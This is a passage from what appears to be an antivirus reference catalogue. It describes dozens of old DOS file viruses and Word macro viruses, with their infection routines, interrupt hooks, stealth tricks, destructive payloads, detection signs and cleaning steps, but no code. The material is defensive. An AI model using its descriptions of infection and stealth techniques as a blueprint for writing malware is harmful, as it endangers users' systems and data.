infect. Otherwise, it will set a flag to be used by INT 1Ch at
a later time.
INT 1Ch: Hooks INT 1Ch to shake the screen from side to side for 33
seconds after the flag is set by INT 21h.
Damage: None
Note: Time and date (except year) of infected files are not
changed. You cannot see the change when you use the "Dir" command
because the last two bytes of the data are not changed (You would
see some problems on arrangement order if you attach "/od" to the
"Dir" command).
Detection method: Infected files increase by 454 bytes.
[Zz1]
Virus Name: Zz1
Virus Type: Overwrite, File Virus (COM files)
Virus Length: 127 bytes
Execution Procedure: Searches for an uninfected COM file on the
current directory and infects it (only infects one file at a
time). If there is no file to infect, it changes data in the
system RAM to set the screen lines to 81. This confuses the screen.
Damage:
1) It overwrites the first 127 bytes of the original files with the
virus code. Original files are destroyed.
2) Confuses the screen if there are no infectable files.
Note: Date and time fields of infected files are not changed.
[Willow]
Virus Name: Willow
Virus Type: Memory Resident, File Virus (EXE files)
Virus Length: 1870 bytes
PC Vectors Hooked: INT 21h
Execution Procedure: Checks whether it has remained in the
memory. If not, hooks INT 14h first, then changes the pointer of
INT FDh to the address that is pointed by INT 21h. Then hooks INT
21h. Lastly, after all memory is released, gets the name of the
Shell executed by the system from the environment parameter. Executes
this Shell again. Terminates upon reloading itself memory resident.
Infection Procedure:
1) Hooks INT 21h to check whether it has stayed resident in memory.
2) Hooks INT 21h(AH=4Bh) to infect files. If the program to be
executed is a COM file, the virus deletes it. If it is an EXE file,
the virus proceeds to infect it.
Damage: It deletes COM files executed while the virus is memory
resident.
Note: Date and time fields of infected files are not changed.
Detection method: Infected files increase by 1870-1885 bytes.
[V-66]
Virus Name: V-66
Virus Type: Overwrites, File Virus (all files)
Virus Length: 66 bytes
Execution Procedure: Infects all files in the current directory.
Infection Procedure: Changes the files' attributes, making them
writable. Proceeds to overwrite the first 66 bytes with the virus
code.
Damage: It overwrites the original files with the virus code.
Original files are destroyed (corrupted).
Detection method: Date and time fields of infected files are changed.
[VCL-408]
Virus Name: VCL408
Virus Type: Overwrites, File Virus (EXE and COM files)
Virus Length: 408 bytes
Execution Procedure: Searches for one uninfected COM or EXE file
on each directory and infects it. Virus records whether the initial
infection is successful or not. Subsequent record will overwrite the
original. Last record is record of last infection. The virus checks
this record before terminating. If the record fails, the virus halts
the system.
Damage:
1) Files are corrupted after becoming infected.
2) Halts system on occasion.
Note:
1) Date and time fields of infected files are not changed.
2) Length of infected files does not change unless the length of
original files is less than 408. If so, the length of infected
files becomes 408 bytes.
[SUNDEVIL]
Virus Name: SunDevil
Virus Type: File Virus (COM files)
Virus Length: 691 bytes
PC Vectors Hooked: INT 21h
Execution Procedure: Checks whether the current date is May 8. If it
is, it destroys the first sector (Boot sector) on the current diskette.
Then it displays the following message and repeats call INT 05h.
"There is no America. There is no Democracy.
There is only IBM, ITT, and AT&T.
This virus is dedicated to all that have been
busted for computer-hacking activities.
The SunDevil Virus (C) 1993 by Crypt Keepr
[SUNDEVIL] "
Otherwise, the virus copies itself to absolute address 9000:0000h.
Then hooks INT21h and returns to the original routine.
Infection Procedure: Hooks INT 21h (AH=3D,3E,56, AX=4300,4B00,4B01) to
infect files. If the program to be executed is an uninfected COM
file, the virus proceeds to infect it.
Damage: It destroys the boot sector of the current diskette if the
current date is May 8.
Note: Date and time fields of infected files are not changed.
Detection method:
1) Infected files increase by 691 bytes.
2) Above message will appear when you use the "Type" command.
[Skew-469]
Virus Name: Skew-469
Virus Type: Memory Resident(OS), File Virus (EXE files)
Virus Length: 469 bytes
PC Vectors Hooked: INT 21h, INT 1Ch
Execution Procedure: Checks whether it resides in the memory. If
not, it copies itself to absolute address 0000:0200h, then hooks
INT21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21h (AX=4B00h or AH=3Dh) to infect files. First,
it hangs INT 24h to prevent divulging its trace when writing.
Then it checks whether the program to be executed is an
uninfected EXE file. If it is, it proceeds to infect it. Finally,
it restores INT 24h.
2) Hooks INT 1Ch. Increases the value of an address by 1 everytime
this interrupt is called. When the value equals FFFFh, the virus
writes the current value to the video card making the screen move
up or down or from side to side.
Damage: Causes the screen to move up to down or from side to side.
Detection method:
1) Date and time fields of infected files are changed.
2) Infected files increase by 469-469+15 bytes.
[Atas_400]
Virus Name: Atas_400
Virus Type: File Virus (COM files)
Virus Length: 400 bytes
PC Vectors Hooked: INT 24h (nullifies the function for dealing with
severe errors)
Execution Procedure:
1) The virus decodes, hangs INT24h to prevent divulging its trace
when writing, then it changes its head.
2) Searches for an uninfected COM file that is larger than 255 bytes
but less than 64256 bytes.
3) Checks the system date. If the Seconds field is less than 3, it
displays the following message:
"I like to travel ...".
Then restores INT 24h and goes back to the original routine.
Damage: None
Note:
1) Only infects one file at a time.
2) Date and time fields of infected files are changed.
[DM-330]
Virus Name: Dm-330
Virus Type: Memory Resident, File Virus (COM files)
Virus Length: 330 bytes
PC Vectors Hooked: INT 21h, 5Fh
Execution Procedure:
1) The virus decodes, then checks whether it has stayed resident
in the memory. If not, it moves itself to absolute address
from 0000:0208h to 0000:0351h.
2) Hooks INT21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 5Fh. Points to the address pointed by the original
INT 21h.
2) Hooks INT 21h to infect files. Virus activates when the system
calls INT 21h to execute a program (AH=4Bh), changes file's
attribute (AH=43h), changes file name (AH=56h), or opens a file
(AH=3Dh). The virus checks whether the program to be executed is an
uninfected COM file. If it is, the virus infects it.
Damage: None
Note:
1) The virus stays in the area for interrupt vectors. This causes
a conflict in the virus routine and the interrupts vectors
(address from 0000:0208h to 0000:0351h).
2) Date and time fields of infected files are not changed.
[CLS]
Virus Name: Cls
Virus Type: Memory Resident, File Virus (COM and EXE files)
Virus Length: 835 bytes
PC Vectors Hooked: INT 21h, INT 08h, INT 13h
Execution Procedure:
1) Checks whether it has stayed resident in the memory. If not,
it moves itself to high memory.
2) Hooks INT 21h, INT 08h and INT 13h and goes back to the
original routine.
Infection Procedure:
INT 21h:
1) Hooks INT21h to check whether it has stayed resident in the
memory.
2) Hooks INT21h to infect files. Virus activates when the system
calls INT21h to execute a program (AH=4Bh). It checks whether
the program to be executed is an uninfected COM file and its
length is between 129 bytes and 64512 bytes. If it is, the
virus infects it.
INT 08h: Hooks INT 08h (Time interrupt, executed once every 1/18
second). Every time this interrupt executes, a counter increments
by 1. When this counter reaches 65520 (about an hour later), the virus
cleans the screen (It has no effect on monochrome because the cleaning
function writes 00 from B800:0000h to B800:0FA0h).
INT 13h: Hooks INT 13h (virus writing assistance).
Damage: The virus cleans the screen once every hour.
Note: Date and time fields of infected files are not changed.
Detection method: Infected files increase by 853 bytes.
[Nouin]
Virus Name: Nouin
Virus Type: Memory Resident, File Virus (COM and EXE files)
Virus Length: 855 bytes
PC Vectors Hooked: INT 83h, 09h, 21h
Execution Procedure:
1) Checks whether it has stayed resident in the memory. If not,
it loads itself to high memory.
2) Hooks INT 21h, INT 09h and INT 83h and goes back to the original
routine. (The method the virus uses to load itself to memory is
fairly crude. It needs the last MCB controlled by DOS in the
address when loading the executed program).
Infection Procedure:
1) Hooks INT 83h to store a word for reporting whether the virus
has stayed resident in the memory or not.
2) Hooks INT 09h to decrement a counter by 1 every time a key is
pressed. Sets the damage_flag when the value reaches zero.
3) Hooks INT 21h (AH=3Dh,aH=43h,AX=4B00h). It checks whether
the program to be executed is an uninfected EXE or COM file
(it skips SCAN.EXE and CLEAN.EXE). If it is a COM file, the virus
checks whether or not the file is larger than 60000. If it is, the
virus infects it. Then it checks if the damage_flag is set. If
it is, the virus checks if the current date is between November 11
and 30. If it is, the virus destroys sectors 1 to 9 on the current
diskette.
Damage: After the virus has stayed resident in the memory, and
the number of times the keyboard has been struck is equal to a certain
value, or the current date is between November 11 and 30, it will
destroy sectors 1 to 9 on the current diskette.
Note: Date and time fields of infected files are not changed.
Detection method: Infected files increase by 855 bytes.
[V-550]
Virus Name: V-550
Virus Type: Memory Resident, File Virus (EXE files)
Virus Length: 550 bytes
PC Vectors Hooked: INT 21h
Execution Procedure:
1) The virus checks whether it has stayed resident in
the memory, and the block of memory which loads the current program
is the last MCB. If it is, it moves itself to high memory.
2) Hooks INT21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21h to check whether it has stayed resident in the memory.
2) Hooks INT 21h to check whether the program to be executed is an
uninfected EXE file. If it is, the virus infects it.
Damage: None
Detection method:
1) Date and time fields of infected files are changed.
2) Infected files increase by about 550 bytes.
3) The total memory decreases by 39 pares after the virus has stayed
resident in the memory.
[Angarsk]
Virus Name: Angarsk
Virus Type: File Virus (COM files)
Virus Length: 238 bytes
Execution Procedure: Searches for all uninfected COM files on
the current and root directories and infects them (length
of infectable files must be less than 32768 bytes).
Damage: None
Detection method:
1) Date and time fields of infected files are changed.
2) Infected files increase by about 238 bytes.
[Enet-613]
Virus Name: Enet-613
Virus Type: File Virus (COM files)
Virus Length: 613 bytes
Execution Procedure:
1) Infects all COM files on the current directory (It does not infect
the same file again).
2) Checks whether the current day is Sunday. If it is, it displays a
message and waits until a key is pressed.
3) Changes the word at address 4000:0013h of RAM to 0200h.
4) Calls INT 19h to reboot the system.
Damage: None
Note:
1) Date and time fields of infected files are not changed.
2) Infected files increase from 613-628 bytes.
[Fri-13D]
Virus Name: Fri-13-D
Virus Type: File Virus (COM files)
Virus Length: 416 bytes
Execution Procedure:
1) When an infected program is executed, it will infect all COM
files (except COMMAND.COM) on the current directory (it does
not infect the same file again).
2) Checks whether the current day is Friday the 13th. If it is,
it deletes itself and then goes back to the original routine.
Damage: An infected program will delete itself if you run it
on Friday the 13th.
Detection method:
1) Date and time fields of infected files are changed.
2) Infected files increase from 416-431 bytes.
[Ash]
Virus Name: Ash
Virus Type: File Virus (COM files)
Virus Length: 280 bytes
Execution Procedure: Infects all infectable COM files on the current
directory (It does not infect the same file again, and does not
infect files larger than 64768). If the number of newly infected files
is less than 2, it will search for infectable files on its father and
father's father directory.
Damage: None
Detection Method:
1) Date and time fields of infected files are changed.
2) Infected files increase by 280 bytes.
[Bljec-1]
Virus Name: Bljec-1
Virus Type: File Virus (COM files)
Virus Length: 301 bytes
Execution Procedure: Checks whether the current month is September.
If it is, it will format the first 16 sectors of the current diskette,
then infects all COM files on the current directory.
Damage: Formats the first 16 sectors of the current diskette if the
current month is September.
Detection Method:
1) Date and time fields of infected files are not changed.
2) Infected files increase by 301 bytes.
[Cas-927]
Virus Name: Cas-927
Virus Type: Memory Resident(HiMem), File Virus (COM files)
Virus Length: 3+927 bytes
PC Vectors Hooked: INT 21h, 1Ch, 28h
Execution Procedure:
1) The virus decodes.
2) Checks whether it has stayed resident in the memory. If not,
it loads itself resident in the high memory.
3) Hooks INT 21h, INT 1Ch and INT 28h and goes back to the original
routine.
Infection Procedure:
INT 21h:
1) Hooks INT 21h to check whether it has stayed resident in
the memory.
2) Hooks INT 21h(AX=4B00h) to infect files. If the program to be
executed is an uninfected COM file and its length is not
larger than 63500 bytes, the virus infects it.
INT 28h:
Hooks INT 28h to check whether the current month is an even month,
current day is Sunday, Tuesday, Thursday, or Saturday, and
current time is 11:11:11. If all these conditions are satisfied, it
sets a damage_flag to be used later by INT 1Ch.
INT 1Ch:
Hooks INT 1Ch to cooperate with INT 28h. If the damage_flag is set,
it changes all uppercase characters on the screen to lowercase.
Damage: None
Note:
1) The virus stays resident in the high memory (it uses 7A pares).
2) Infected files increase by 855 bytes.
3) Date and time fields of infected files are not changed.
[CSFK]
Virus Name: Csfk
Virus Type: Memory Resident(MCB), File Virus (COM files)
Virus Length: 5+918 bytes
PC Vectors Hooked: INT 21h
Execution Procedure:
1) The virus decodes.
2) Checks whether it has stayed resident in the memory. If not, it
loads itself memory resident.
3) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21h to check whether it has stayed resident in
the memory.
2) Hooks INT 21(AH=4Bh) to infect files. If the program to be
executed is an uninfected COM file and its length is between
25 bytes and 63500 bytes, the virus infects it.
Damage: None
Note:
1) The virus stays resident in the memory (MCB) (it uses 6A pares).
2) Infected files increase by 918 bytes.
3) Date and time fields of infected files are not changed.
[Warrier1]
Virus Name: Warrier1
Virus Type: Memory Resident(HiMem), File Virus (COM files)
Virus Length: 300 bytes
PC Vectors Hooked: INT 21h
Execution Procedure:
1) The virus decodes.
2) Checks whether it has stayed resident in the memory. If not, it
loads itself memory resident.
3) Hooks INT21h and goes back to the original routine.
Infection Procedure: Hooks INT 21h(AX=4B00h) to infect files. If the
program to be executed is an uninfected COM file (except
COMMAND.COM), the virus infects it.
Damage: None
Note:
1) The virus stays resident in the high memory (it uses 61 pares).
2) Date and time fields of infected files are not changed.
3) The change in the infected file's length varies depending on the
following:
i) If the original file is not larger than 768 bytes, its
infected version will be 1536 bytes long.
ii) If the original file is larger than 768 bytes, its infected
version will increase by 768 bytes.
Cleaning Method: Delete the first 768 bytes from infected files.
[Athens]
Virus Name: Athens
Virus Type: Memory Resident(HiMem), File Virus (COM and EXE files)
Virus Length: 1,463 bytes
PC Vectors Hooked: INT 21h
Execution Procedure:
1) The virus decodes.
2) Checks whether it has stayed resident in the memory. If not, it
loads itself resident in the high memory.
3) Hooks INT21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21h to check whether it has stayed resident in
the memory.
2) Hooks INT 21h(AX=4B00h) to infect files. If the program to be
executed is an uninfected EXE or COM (except COMMAND.COM)
file, the virus infects it.
3) Hooks INT 21h (AX=4Eh,4Fh,11h,12h) to check
whether the current program has been infected. If it is, the
virus changes the file's length and date in DTA to their original
data. This prevents users from noticing the change in the length
and date of infected files while the virus is memory resident.
Damage: None
Note:
1) The virus stays resident in the high memory (it uses DFh pares).
2) Infected files increase by 1463 bytes. You can not see
the increase while the virus is memory resident.
3) Date and time fields of infected files are changed. You can not
see this while the virus is memory resident.
[Commy]
Virus Name: Commy
Virus Type: File Virus (COM files)
Virus Length: 998 bytes
Execution Procedure:
1) The virus decodes.
2) Checks whether the current minute is less than 10, and the current
DOS version is above 3.0. If all these conditions are satisfied,
it will search for a COM file with length between 4567 bytes and
64520 bytes, and infects it (the virus infects one file at a time).
3) It goes back to the original routine.
The search path is the value specified by PATH. When the virus infects
a file, it encodes the file's time to verify it is infected.
Damage: None
Note:
1) Infected files increase by 998 bytes.
2) The dates of infected files are not changed.
3) The time fields of infected files are changed due to the encoding.
[Arriba]
Virus Name: Arriba
Virus Type: Memory resident, File Virus (COM and EXE files)
Virus Length: 1,590 bytes
PC Vectors Hooked: INT 21h, INT 08h
Execution Procedure:
1) Checks whether it has stayed resident in the memory. If it has,
it will go back to the original routine directly. Otherwise, it
will move itself to high memory.
2) Hooks INT21h and checks whether the current date is November 20. If
it is, it hooks INT 08h and goes back to the original routine.
Infection Procedure: Hooks INT 08h to display a message and then halt
the system. Hooks INT 21h(AX=4B00) to check whether the program being
executed is infected. If not, the virus will infect it in
different ways according to its type: if it is a COM file, it
will write the virus code at the beginning of the original file,
followed by the original file's code, and attach two bytes of
identified code at the end of the file to verify that this file is
already infected; if it is an EXE file, it will attach the virus code
at the end of the original file's code, then change the head of file
and attach the identified code at the end.
Damage: Halts the system when INT 08h is called.
Note:
1) The date and time fields of infected files are not changed.
2) The method the virus uses to move the code is special. First, it
tests whether the address A0000h is writable. If not, it moves 1000
bytes of this area to a lower address repeatedly until it finds a
writable area. Then it moves the virus codes into this area. You
will not notice the changes in the memory by MEM program because
it has not changed the size of the memory blocks. This method may
cause damage to the virus code, and may even halt the system.
Detection method: Infected files increase by 1590 bytes.
[Ekoterror]
Virus Name: Ekoterror
Virus Type: Memory Resident(HiMem), File Virus, Partition Virus
Virus Length: 2,048 bytes
PC Vectors Hooked: INT 08h, 13h, 21h
Execution Procedure:
1) When an infected program is executed, the virus writes its viral
code to the Partition. The virus will not check whether the
Partition is already infected or not, thus executing an infected
file several times will delete all data in the Partition.
2) Hooks INT 08h, INT 13h, and call INT 08h to check whether DOS has
been loaded. If it has, it hooks INT 21h.
Infection Procedure: Hooks INT 08h to check whether DOS has been
loaded. If it has, it hooks INT 21h.
Hooks INT 13h to check whether the sector loaded is the Partition. If
it is, it will revert back or change the data of the original
Partition.
Hooks INT 21h to infect COM files when reading or writing files.
Damage: The virus deletes the data in the Partition after executing
an infected file several times.
Note:
1) If the virus has invaded the Partition, you will not be able to
load or save data onto the hard disk if you booted the system
from a diskette. This is because the data in the Partition has
already changed.
2) If the DOS version is not suitable, or the INT 08h code does not
conform to the DOS loading process, the virus can not hook INT 21.
This prevents the virus from infecting files.
Cleaning Method: Boot up from an uninfected diskette. Then use a
program that can read or write data on the hard disk (like Debug) to
write the data of the original Partition back (The virus moves the
data of the original Partition to 0 side, 0 track, 5 sector. Every
time it is infected, it will add 4 to the number of sectors).
[AST-976]
Virus Name: Ast-976
Virus Type: Memory Resident, File Virus (COM files)
Virus Length: 976 bytes
PC Vectors Hooked: INT 21h
Execution Procedure:
1) The virus decodes.
2) Checks whether it is resident in the memory. If not, it loads itself
resident in the high memory.
3) Hooks INT 21h and infects all COM files on the current directory (it
does not infect the same file again).
4) Checks whether the current minute is 17. If it is, it makes some
modifications on the Partition to keep the system from booting
correctly.
Infection Procedure:
1) Hooks INT 21h to check whether it is memory resident.
2) Hooks INT 21(AX=4B00h) to infect files. If the program to be
executed is an uninfected COM file, the virus infects it.
Damage: When the virus activates, it makes the screen flash once.
Then it changes data in the Partition. The change is achieved by
XORing every fourth byte of the four Partition records with 55 (there
are four Partition records in the Partition table).
Note: The date and time fields of infected files are not changed.
Detection method: Infected files increase by 976 bytes.
[AST-1010]
Virus Name: Ast-1010
Virus Type: Memory Resident, File Virus (COM and EXE files)
Virus Length: 1,010 bytes
PC Vectors Hooked: INT 21h
Execution Procedure:
1) The virus decodes.
2) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
3) Hooks INT21h and infects all COM and EXE files on the current
directory (it does not infect the same file again).
4) Checks whether the current day is the 16th. If it is, it makes
changes to the Partition to keep the system from booting correctly.
Infection Procedure:
1) Hooks INT 21h to check whether it is memory resident.
2) Hooks INT 21(AX=4B00h) to infect files. If the program to be
executed is an uninfected COM or EXE file, the virus infects it.
Damage: When the virus activates, it makes the screen flash once.
Then it modifies the Partition. The change is achieved by
XORing every fourth byte of four Partition records with 55 (there
are four Partition records in the partition table).
Note:
1) Date and time fields of infected files are not changed.
2) The method of checking whether the virus is memory resident
is the same as the AST-976 virus. Thus, these two viruses can
not stay memory resident at the same time.
Detection method: Infected files increase by 1010 bytes.
[Filler]
Virus Name: Filler
Virus Type: File Virus
Execution Procedure: When an infected file is executed, the virus
writes some garbage information into some sectors on the floppy
inserted in the A drive.
Damage: Destroys some sectors in the diskette inserted in the A
drive (starts from 0 side, 28 track, 1 sectors, damages 8 sectors).
[Path]
Virus Name: Path
Virus Type: File Virus (COM files)
Virus Length: 3+906 bytes
Execution Procedure:
1) Decodes its later half.
2) Checks for other infected files. If there is, it only infects
one program. Otherwise, it goes back to run the original routine.
The search path is the path set in PATH.
The condition for the infectable file is that it must be an uninfected
COM file with length between 10 bytes and 64000 bytes.
Damage: None
Note:
1) Does not stay resident in memory.
2) Date and time fields of infected files are not changed.
3) Infected files increase by 906+G bytes (0<=G<=247).
[Flower]
Virus Name: Flower
Virus Type: File Virus (EXE files)
Virus Length: 883 bytes
Execution Procedure:
1) Decodes its encoded section.
2) Checks whether the current date is November 11, or whether the
virus version is not less than 174. If one of these conditions is
satisfied, the virus destroys the original program (Document) and
goes back to run the original routine. Otherwise, it searches for
the first uninfected file on the current directory and infects it.
Then it searches for the first uninfected file on the subdirectory
under the root directory
and infects it.
3) Goes back to run the original routine.
Every infected file has its own number. When it infects a file, it
increases the current number by 1. This number will be delivered to the
next infection process.
Damage: When the virus activates, the virus attaches a procedure
to the original procedure to display a message (An English poem whose
title is "FLOWER"). Then it destroys the original procedure by
overwriting its front data.
Note: Date fields of infected files are not changed; however, the
time fields are changed due to the encoding of the time fields.
[Grunt-3]
Virus Name: Grunt-3
Virus Type: File Virus (COM files)
Virus Length: 3+473 bytes
Execution Procedure:
1) Decodes its later half section.
2) Checks if there is an uninfected COM or EXE file on the current
and all father directories. If there is, it checks whether the
current year is not less than 1993 and it is Friday. If it is,
it does not infect any files except for displaying the following:
"This is a hot LZ ...Eradicating the Enemy!".
Otherwise, the virus infects it (it only infects one file at a
time).
Damage: None
Note:
1) Does not stay resident in memory.
2) Date and time fields of infected files are not changed.
Detection method: Infected files increase by 473 bytes.
[Ultrasik-1967]
Virus Name: Ultrasik-1967
Virus Type: File Virus (EXE files)
Virus Length: 1967 bytes
Execution Procedure: Searches for an uninfected EXE file and
infects it. The searching path is from the current directory to its
subdirectory, to subdirectories under the last subdirectory, to the
root directory, to subdirectories under the root directory. After that,
it goes back to the original routine. If there is no infectable file,
it halts the system (the original plan is to format C. But it instead
halts the system due to a bad instruction in the viral code).
Damage: None
Note: Date and time fields of infected files are not changed.
Detection method:
1) Infected files will increase.
2) The algorithm is: First, add original length to let it become a
multiple of 16. Then increases it by 1967 bytes.
[Madden]
Virus Name: Madden
Virus Type: File Virus (EXE files)
Virus Length: 1988 bytes
Execution Procedure: Searches for an uninfected EXE file and
infects it. The searching path is from the current directory to its
subdirectory, to the subdirectories under the last subdirectory, to the
root directory, to the subdirectories under root directory. After that,
it goes back to the original routine. If there is no infectable file,
the virus issues a strange sound that stops only when the system is
rebooted.
Damage: None
Note: Date and time fields of infected files are not changed.
Detection method:
1) Infected files increase.
2) The algorithm is: First add to the original length to let it become
a multiple of 16, and then increase it by 1988 bytes.
[Madden-B]
Virus Name: Madden-B
Virus Type: File Virus (EXE files)
Virus Length: 1440 bytes
Execution Procedure: Searches for an uninfected EXE file and
infects it. The searching path is from the current directory to its
subdirectory, to the subdirectories under the last subdirectory, to the
root directory, to the subdirectories under the root directory. After
that, it goes back to the original routine. If there is no infectable
file, the virus issues a sound from high to low, from low to high, and
so on until the system is rebooted.
Damage: None
Note: Date and time fields of infected files are not changed.
Detection method:
1) Infected files increase in length.
2) The algorithm is: First add original length to let it become a
multiple of 16, and then increase it by 1440 bytes.
[Prime]
Virus Name: Prime
Virus Type: File Virus (*.C*; mainly *.COM)
Virus Length: 580 bytes
PC Vectors Hooked: INT 01h, INT 03h, INT 24h
Execution Procedure:
1) It decodes its later half section.
2) Checks whether the current day is 1. If it is, it displays a message
and rotates the screen from left to right once. No matter what
the day is, it searches for an uninfected file on the current
directory and infects it.
3) Then ends.
Infection Procedure:
1) Gets the original codes and encodes them with F3h.
2) Gets the system time and encodes it with the virus' later half codes.
3) Attaches virus code to the original file, followed by the original
codes.
Hooks INT 01h, INT 03h to avoid the Debug program.
When this program is executed, it jumps to FE05Bh to reboot the
system. Hooks INT 24h to prevent write protection on the current
diskette. When INT 24h is called, it halts the system because
of a bad viral code.
Damage: Original programs are encoded, preventing them to execute
after the virus is executed.
Note:
1) Does not stay resident in the memory.
2) The virus halts the system when it detects an uninfectable
*.C* file on the current directory.
3) Date and time fields of infected files are not changed.
Detection method: Infected files increase by 580 bytes.
Cleaning Method: Delete the first 580 bytes on infected files. The
remaining bytes will XOR with F3h one by one.
[PSV-354]
Virus Name: Psv-354
Virus Type: File Virus (COM files)
Virus Length: 354 bytes
Execution Procedure:
1) It decodes its later half section.
2) Checks for uninfected COM files with lengths between 150 bytes
and 65000 bytes. If there is/are, only infects one of them.
Otherwise, it goes back to run the original routine.
Damage: None
Note:
1) Does not stay resident in the memory.
2) Date and time fields of infected files are not changed.
3) Does not infect COMMAND.COM of DOS 5.0.
Detection method: Infected files increase by 354 bytes.
[PCBB]
Virus Name: Pcbb
Virus Type: Memory resident, File Virus (COM files)
Virus Length: 3+(1675-1687) bytes
PC Vectors Hooked: INT 09h, INT 1Ch, INT 21h
Execution Procedure:
1) It decodes its later half section.
2) Checks whether it is memory resident or not. If not, it
loads itself resident into the high memory.
3) Hooks INT 21h,INT 09h,INT 1Ch and goes back to run the
original routine.
Infection Procedure: Infection occurs when executing a program,
copying a file, changing the file's attribute, opening a file,
closing a file, or renaming a file (AH=56h). When it
infects a file, it checks first for the day of the week and selects
the corresponding encoding mode for that day. There are seven possible
encoding modes.
The virus does not infect the same file, and only infects files with
lengths between 16 bytes and 61440 bytes.
Symptom: While the virus is activated, the screen goes blank when the
total number of keys pressed is equal to 957. After this, the virus
resets the counter and restarts all over again. You can press the
Alt, Control, Shift left and right together to return the screen to
normal operation.
Damage: None
Note: It stays resident in the memory and uses 4K bytes.
Detection method:
1) Date and time fields of infected files are changed.
2) Infected files increase by 1675, 1677, 1679, 1679, 1680, 1683, or
1687 bytes depending on the day (from Sunday to Saturday
respectively).
3) PCBB attaches itself at the end of infected files.
[Comspec]
Virus Name: Comspec
Virus Type: File Virus
Virus Length: 3424 bytes
Execution Procedure:
1) Executes COMMAND.COM to create six copies of the virus file
using six file names from the C:\DOS directory. These copies
are saved in the current directory. If there is no C:\DOS
directory, it creates a file named "COMSPEC."
Damage: It overwrites six files if it is executed in the C:\DOS
directory.
Detection method: Length of infected files is 3424.
[T-1000]
Virus Name: T-1000
Virus Type: File Virus (COM files)
Virus Length: 128 bytes
Execution Procedure:
1) It decodes its later half section.
2) Infects all COM files in the current directory.
Infection Procedure:
1) Gets the system time and encodes it with the original
procedure.
2) Overwrites its first 128 bytes by the virus code. If it is
less than 128 bytes, it will be 128 bytes after it has been
infected. Otherwise, the size will not change.
Damage: Overwrites the first 127 bytes of the original file with
the virus code, thus corrupting the file.
Detection method: Date and time fields of infected files are changed.
[Seneca]
Virus Name: Seneca
Virus Type: File Virus (EXE files)
Virus Length: 392 bytes
Execution Procedure: The virus gets the system date and time and
infects the system depending on the following conditions:
(1)Current year is not larger than 1980 and current minute is
less than 30, or current year is larger than 1980 and current
day is not November 25: It infects all EXE files on the
current and all father directories.
(2)Current year is not larger than 1980 and current minute is
not less than 30: It displays this message: "You shouldn't
use your computer so much, it's bad for you and your computer."
Then destroys the current diskette.
(3)Current year is larger than 1980 and current day is November
25: It displays the following message:
"HEY EVERYONE!!!"
"Its Seneca's B-Day ! Let's Party!"
Then destroys the current diskette. The method of destroying
the diskette for (2) and (3) is: Write some data onto the first
255 sectors of the diskette, thus deleting important data on
it.
Damage: In condition (1), infected files are destroyed because their
first 392 bytes are overwritten. In condition (2) and (3), the first
255 sectors of the diskette are overwritten.
Note: Date and time fields of infected files are not changed.
Detection method: One of the messages above appears on the screen.
[Word.Baby.A]
Virus Name: Word.Baby.A
Virus Type: Word Macro Virus
Alias: Punten
Platform: Word 6/7
Number_of_macros: 10
Encrypted: Yes
Size_of_macros: 4322 Bytes
Place_of_origin: Unknown
Date_of_origin: Spring 1997
Payload: Yes
Trigger_date: March 24th, October 15th, 1st, 30th, September 21st
Password: None
Seen_In_The_Wild: No
Seen_where: UK
DESCRIPTION:
Word.Baby.A infects the global template (normal.dot) when an infected
document is opened. Further documents become infected when they
are also opened and saved (FileSave and FileSaveAs).
Baby.A uses ToolsMacro and ToolsCustomize to make recognition
of an infected document more difficult (called macro stealth technique).
When a user selects ToolMacro/ToolsCustomize, the following message is
displayed:
" 57773LKOM ! "
The following messages are displayed when a user exits Microsoft Word:
On the 24th of March:
" Stop Work Let's Party, this is my Day ! "
On the 1st after 3 p.m:
" 57773LK0M ! "
On the 15th of October:
"GiE, You're gettin' Old, Bro !"
On the 21st of September:
" Cathy, this is your day. Have Fun ! "
When a document is printed on the 30th of each month, Baby.A inserts
the following text into the active document:
" Punten ... "
" I Just Wanna Give a Shut Up to @Rapi.Kom: "
" Just Don't Make Any Destructive Virus Ok ! "
" Insert "We're East-Man Remember ! "
" Insert "Peace 2 all My Home-Bro' Out There ! "
" Insert "I'm Outta here !! Mangga sadayana... "
[Word.Balu.A]
Virus Name: Word.Balu.A
Virus Type: Word Macro Virus
Alias: None
Platform: Word 6/7
Number_of_macros: 2 or 1
Encrypted: Yes
Size_of_macros: 776 or 646 Bytes
Place_of_origin: Germany
Date_of_origin: Spring 1997
Payload: Yes
Trigger_date: April 5th, April 16th
Password: SSichliebeDich, SSICHLIEBEDICH
Seen_In_The_Wild: No
Seen_where:
DESCRIPTION:
Word.Balu does not infect any other documents. It is classified as a
trojan horse.
Balu only works with the German version of Microsoft Word, since it
uses language specific macros.
On the 5th of April, Balu renames the following files:
" c:\command.com" to "c:\kniffel\com.com "
" c:\msdos.sys" to "c:\kniffel\ms.sys "
" c:\io.sys" to "c:\kniffel\ii.sys "
Balu's second payload adds the following password to saved documents:
" SSichliebeDich "
" SSICHLIEBEDICH "
On the 16th of April, Balu displays the following message:
" Dicke aus Schwelm, ich werde Dich immer lieben, weil die Tⁿr
" zu meinem Herzen immer fⁿr Dich offen steht, egal was passiert. "
" Ich hoffe Du verzeihst mir. "
" Dein balu aus Schwelm "
[Word.Barbaro.A:It]
Virus Name: Word.Barbaro.A:It
Virus Type: Word Macro Virus
Alias: Nostradamus
Platform: Word 6/7
Number_of_macros: 3
Encrypted: No
Size_of_macros: 2813 Bytes
Place_of_origin: Italy
Date_of_origin: December 1996
Payload: Yes
Trigger_date: 31st
Password: None
Seen_In_The_Wild: No
Seen_where:
DESCRIPTION:
Word.Barbaro infects the global template when an infected document
is opened. Further documents become infected when they are
saved (FileSalva).
Word.Barbaro uses StrumMacro to make recognition of an infected
document more difficult (called macro stealth technique).
On the 31st of each month, Barbaro displays the following message:
"Barbaro impero dal terzo sarai soggiogato "
"Gran parte d'individui della sua origine farα perire "
"Per decesso senile avverrα la sua fine, il quarto colpirα "
"Per timore che il sangue con il sangue morte ne derivi. "
" NOSTRADAMUS Virus "
Word.Barbaro only works with the Italian version of Microsoft Word,
since it uses language specific macros.
[Word.ABC.A]
Virus Name: Word.ABC.A
Virus type: Word Macro Virus
Alias: None
Platform: Word 6/7
Number_of_macros: 3
Encrypted: Yes
Size_of_macros: 1836 (1801) Bytes
Place_of_origin: USA
